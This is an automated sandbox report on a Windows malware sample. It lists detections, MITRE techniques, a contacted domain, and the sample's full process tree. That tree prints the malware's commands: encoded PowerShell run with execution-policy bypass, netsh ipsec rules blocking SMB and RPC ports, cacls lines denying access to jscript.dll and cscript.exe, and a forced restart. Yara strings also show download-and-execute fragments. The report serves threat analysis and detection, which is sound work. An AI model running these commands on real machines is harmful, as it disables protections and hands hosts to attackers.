ID: 470361 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 05:27:26 Date: 24/08/2021 Version: 33.0.0 White Diamond Table of Contents


Copyright Joe Security LLC 2021 Page 4 of 44

Windows Analysis Report

Overview

General Information

Analysis ID: 470361
Most interesting Screenshot:
System is w10x64

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Gauge labels: malicious, suspicious, clean

Classification

Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Empire PowerShell Launch Parameters
Uses netsh to modify the Windows network and firewall settings
Encrypted powershell cmdline option found
Very long command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Csc.exe Source File Folder
Sigma detected: Suspicious Certutil Command
Uses powercfg.exe to modify the power settings
Queries the volume information (nam…
Yara signature match
Very long cmdline option found, this…
May sleep (evasive loops) to hinder…
Creates files inside the system directory
Sample execution stops while proce…
Too many similar processes found
JA3 SSL client fingerprint seen in co…
Found dropped PE file which has no…
Uses insecure TLS / SSL version fo…
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / Us…
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permission…
Compiles C# or VB.Net code
Creates or modifies windows services
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mo…
Sigma detected: Non Interactive PowerShell

Process Tree

cmd.exe (PID: 3208 cmdline: cmd /C 'powershell.exe -nop -exec bypass -Encode [base64-encoded command blob omitted]' MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 4356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 4996 cmdline: powershell.exe -nop -exec bypass -Encode [base64-encoded command blob omitted] MD5: DBA3E6449E97D4E3DF64527EF7012A10)
powershell.exe (PID: 900 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand [base64-encoded command blob omitted] MD5: DBA3E6449E97D4E3DF64527EF7012A10)
csc.exe (PID: 372 cmdline: 'C:\Windows\.\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
cvtres.exe (PID: 1496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2CD4.tmp' 'c:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
msiexec.exe (PID: 1064 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B689D01F43C91B84ED8BE4676C8E722B MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
msiexec.exe (PID: 5248 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8A139D1F2E341CAE02DE3AE4A26DCC8A E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
netsh.exe (PID: 4860 cmdline: 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 install MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 1692 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianye MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5744 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5968 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 6032 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 6096 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 4072 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5616 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 4568 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 896 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 4968 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 2596 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
netsh.exe (PID: 4864 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5916 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
conhost.exe (PID: 1256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5296 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5040 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 1752 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 3520 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5228 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5908 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5880 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 5240 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 6056 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static set policy name=qianye assign=y MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
takeown.exe (PID: 644 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\jscript.dll MD5: 13FC919F91DAE13EA83970363CE170BD)
conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cacls.exe (PID: 4956 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\jscript.dll /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
takeown.exe (PID: 4488 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\jscript.dll MD5: 13FC919F91DAE13EA83970363CE170BD)
conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cacls.exe (PID: 3940 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\jscript.dll /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
takeown.exe (PID: 2212 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\cscript.exe MD5: 13FC919F91DAE13EA83970363CE170BD)
conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cacls.exe (PID: 2604 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\cscript.exe /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
takeown.exe (PID: 5504 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\cscript.exe MD5: 13FC919F91DAE13EA83970363CE170BD)
conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cacls.exe (PID: 5268 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\cscript.exe /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powercfg.exe (PID: 6092 cmdline: 'C:\Windows\SysWOW64\powercfg.exe' /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c MD5: FA313DB034098C26069DBADD6178DEB3)
conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 6072 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' - -Seconds 900; Restart-Computer -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20210824\PowerShell_transcript.061544.OIWNDrfK.20210824052843.txt
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  0x14a:$sa2: -EncodedCommand
  0x103c:$sa2: -EncodedCommand
  0x2239:$sa2: -EncodedCommand
  0x33f6:$sa2: -EncodedCommand
  0x138:$sc1: -nop
  0x102a:$sc1: -nop
  0x2227:$sc1: -nop
  0x33e4:$sc1: -nop
  0x13d:$se2: -exec bypass
  0x102f:$se2: -exec bypass
  0x222c:$se2: -exec bypass
  0x33e9:$se2: -exec bypass
  0x13d:$se4: -exec bypass
  0x102f:$se4: -exec bypass
  0x222c:$se4: -exec bypass
  0x33e9:$se4: -exec bypass

Memory Dumps

Source: 00000002.00000002.508337108.0000000005057000.00000004.00000001.sdmp
Rule: Invoke_PSImage
Description: Detects a command to execute PowerShell from String
Author: Florian Roth
Strings:
  $: IEX([System.Text.Encoding]::ASCII.GetString( at 0x1870, 0x1fa0, 0x150e4, 0x15814
  $: System.Drawing.Bitmap((a Net.WebClient).OpenRead( at 0x15e4, 0x1d14, 0x14e58, 0x15588

Source: 00000002.00000002.508576402.00000000050EF000.00000004.00000001.sdmp
Rule: Invoke_PSImage
Description: Detects a command to execute PowerShell from String
Author: Florian Roth
Strings:
  $: IEX([System.Text.Encoding]::ASCII.GetString( at 0x173e, 0x1e6e, 0x32a2, 0x39d2
  $: System.Drawing.Bitmap((a Net.WebClient).OpenRead( at 0x14b2, 0x1be2, 0x3016, 0x3746

Source: 00000002.00000002.508214967.0000000005009000.00000004.00000001.sdmp
Rule: Invoke_PSImage
Description: Detects a command to execute PowerShell from String
Author: Florian Roth
Strings:
  $: IEX([System.Text.Encoding]::ASCII.GetString( at 0x20d6, 0x2806, 0xac56, 0xb462, 0xbc82, 0xc292, 0xc934, 0xd0c6, 0xd8d2, 0xf2ca, 0xfb86, 0x103a6, 0x109b6, 0x11058, 0x117ea, 0x11ff6
  $: System.Drawing.Bitmap((a Net.WebClient).OpenRead( at 0x1e4a, 0x257a, 0x6702, 0xb1b2, 0xb9fa

Source: 00000002.00000002.508316918.0000000005052000.00000004.00000001.sdmp
Rule: Invoke_PSImage
Description: Detects a command to execute PowerShell from String
Author: Florian Roth
Strings:
  $: IEX([System.Text.Encoding]::ASCII.GetString( at 0x2c44, 0x3374
  $: System.Drawing.Bitmap((a Net.WebClient).OpenRead( at 0x29b8, 0x30e8

Source: 00000002.00000002.508383686.000000000506E000.00000004.00000001.sdmp
Rule: Invoke_PSImage
Description: Detects a command to execute PowerShell from String
Author: Florian Roth
Strings:
  $: IEX([System.Text.Encoding]::ASCII.GetString( at 0x1d10, 0x2440
  $: System.Drawing.Bitmap((a Net.WebClient).OpenRead( at 0x1a84, 0x21b4

Sigma Overview

System Summary:

Sigma detected: Empire PowerShell Launch Parameters

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Csc.exe Source File Folder

Sigma detected: Suspicious Certutil Command

Sigma detected: Conhost Parent Process Executions

Sigma detected: Non Interactive PowerShell

Jbx Signature Overview


System Summary:

Malicious sample detected (through community Yara rule)

Very long command line found

Uses powercfg.exe to modify the power settings

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Mitre Att&ck Matrix

The matrix is listed per tactic column; the trailing numbers after a technique are the report's per-technique signature counts.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services

Execution: Command and Scripting Interpreter 1 1; PowerShell 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task

Persistence: Windows Service 1; Services File Permissions Weakness 1; DLL Side-Loading 1; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items

Privilege Escalation: Windows Service 1; Process Injection 1 2; Services File Permissions Weakness 1; DLL Side-Loading 1; Network Logon Script; Rc.common; Startup Items

Defense Evasion: Masquerading 1 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 2 1; Process Injection 1 2; Deobfuscate/Decode Files or Information 1; Services File Permissions Weakness 1; DLL Side-Loading 1

Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync

Discovery: Security Software Discovery 1; Process Discovery 2; Virtualization/Sandbox Evasion 2 1; Application Window Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 1 2

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management

Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol

Command and Control: Encrypted Channel 2; Non-Application Layer Protocol 1; Application Layer Protocol 2; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points

Behavior Graph

[Behavior graph: rendered as an image in the original report. ID: 470361, Cookbook: defaultwindowscmdlinecookbook.jbs, Startdate: 24/08/2021, Architecture: WINDOWS, Score: 84. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.]

Process nodes visible in the graph: cmd.exe, powershell.exe (two instances), conhost.exe (several instances), msiexec.exe (two instances), netsh.exe (three instances), csc.exe, cvtres.exe, plus "30 other processes" and "25 other processes".

DNS/IP node: 6fz.one, 104.21.0.250, port 443 (local ports 49681, 49682), CLOUDFLARENETUS, United States, marked "Is malicious".

Dropped-file nodes: C:\Users\user\AppData\...\hjp55l32.cmdline (UTF-8) and C:\Users\user\AppData\Local\...\hjp55l32.dll (PE32).

Signature nodes: Malicious sample detected (through community Yara rule); Sigma detected: Suspicious PowerShell Parameter Substring; Sigma detected: Empire PowerShell Launch Parameters; 2 other signatures; Uses netsh to modify the Windows network and firewall settings; Uses powercfg.exe to modify the power settings; Encrypted powershell cmdline option found; Very long command line found.

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
crl.m | 0% | URL Reputation | safe
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://6fz.one/d.php?i=16t | 0% | Avira URL Cloud | safe
https://go.micro | 0% | URL Reputation | safe
https://6fz.one/d.php?i=16 | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
www.microsoft.co | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://6fz.one/d.php?i=1t | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://6fz.one/d.php?i=2 | 0% | Avira URL Cloud | safe
https://6fz.one/d.php?i=1 | 0% | Avira URL Cloud | safe
https://6fz.one/d.php?i=3 | 0% | Avira URL Cloud | safe
https://6fz.one | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
6fz.one | 104.21.0.250 | true | false | | unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.0.250 | 6fz.one | United States | | 13335 | CLOUDFLARENETUS | false

Private

IP 192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 470361
Start date: 24.08.2021
Start time: 05:27:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 23s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 86
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason:
Detection: MAL
Classification: mal84.evad.win@111/45@3/2
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI

Simulations

Behavior and APIs

Time | Type | Description
05:28:31 | API Interceptor | 105x Sleep call for process: powershell.exe modified
05:29:24 | API Interceptor | 1x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
104.21.0.250 | PBCh1LQrQT.exe | | malicious | | www.searchlakeconroehomes.com/wufn/?5j=PMoU3Bb60umbJ9nm9Lu9lk9x8XSdLDPlrCt++bti7zRCL3goWIAjDJ2GDCa1ICpzF5Wi&hTND=p2MTzn
| YaRh8PG41y.exe | | malicious | | www.searchlakeconroehomes.com/wufn/?EZwxI0z8=PMoU3Bb60umbJ9nm9Lu9lk9x8XSdLDPlrCt++bti7zRCL3goWIAjDJ2GDCafXyZzB7ei&WH=3fuXGd

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
CLOUDFLARENETUS

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
bd0bf25947d4a37404f0424edf4db9ad
54328bd36c14bd82ddaa0c04b25ed9ad

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 14734
Entropy (8bit): 4.993014478972177
Encrypted: false
SSDEEP: 384:wZvOdB8Ypib4JNXp59PVoGIpN6KQkj2dAYotiQ0HzAF8:UvOdB8YNNZjPV3IpNBQkj2dAYotinHzr
MD5: D96346051D2D86BEE0F5D3BE7C1366A4
SHA1: 65ED0D1C95151F57B0692E4370BFE43255DE19B9
SHA-256: 354A7096B260FC9F1D57BF2FD154C9D214D18C08B075149C7F2708098D4EA636
SHA-512: 3705927BDA281E6FC85264542BBBC93475FA1F7CFCFE81F930895DBF683B8C059553E6A6F04AF338C1B1C2BF5D79C361C9700D46B819577798C970B03B4BE6CA
Malicious: false
Preview: PSMODULECACHE...... #y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1...... Start-BitsTransfer...... Set-BitsTransfer ...... Get-BitsTransfer...... Resume-BitsTransfer...... Add-BitsFile...... Suspend-BitsTransfer...... Complete-BitsTransfer...... Remove-BitsTransfer...... -.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy...... Unregister-AppBackgroundTask...... Get-AppBackgroundTask...... tid...... pfn...... iru....%...Enable-AppBackgroundTaskDiagnosticLog...... Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog...... w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1...... Unregister-PackageSource...... Save-Package...... Install-PackageProvider...... -PackageProvider...... Install-Package...... Get-PackageProvider...... Get-Package...... Unins

C:\Users\user\AppData\Local\Temp\RES2CD4.tmp
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: data
Category: dropped
Size (bytes): 2196
Entropy (8bit): 2.737924021577132
Encrypted: false
SSDEEP: 24:BpHIkKH2hK8qQflI+ycuZhNndakSeyPNnq9epvK9oB:BpZKMK8qQ91ulnda3eeq9sB
MD5: 2490F95C4ABB862ABA146B7CF447A5E1
SHA1: 26168C41796C36ECC5D9F5A13034BA1598352F6E
SHA-256: 266ED270DF94B86D0CD870D7E07263CC0B6C46CD8577EF2794B5F4F4E5387F4F
SHA-512: 29F66D530A633AFBF5602E4DAD786C623245DE263FFC4CDDF0B4CB867153DFC018BFBDD69B5F00C17DBC2A94062D24179F06598DE4903877A3AA32B08C5D8020
Malicious: false
Preview: ...... U....c:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP...... fI..f...... 5...... C:\Users\user\AppData\Local\Temp\RES2CD4.tmp.-.<...... '...Microsoft (R) CVTRES.d.=..cwd.C:\Program Files (x86)\AutoIt3.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4ksxptp.gfo.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qftbkgyi.p50.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seh1mxce.3dz.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttyv11rl.vz4.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vr0sx14d.kdh.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjqaex00.s0q.ps1
(six files, all with the following identical metadata)
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
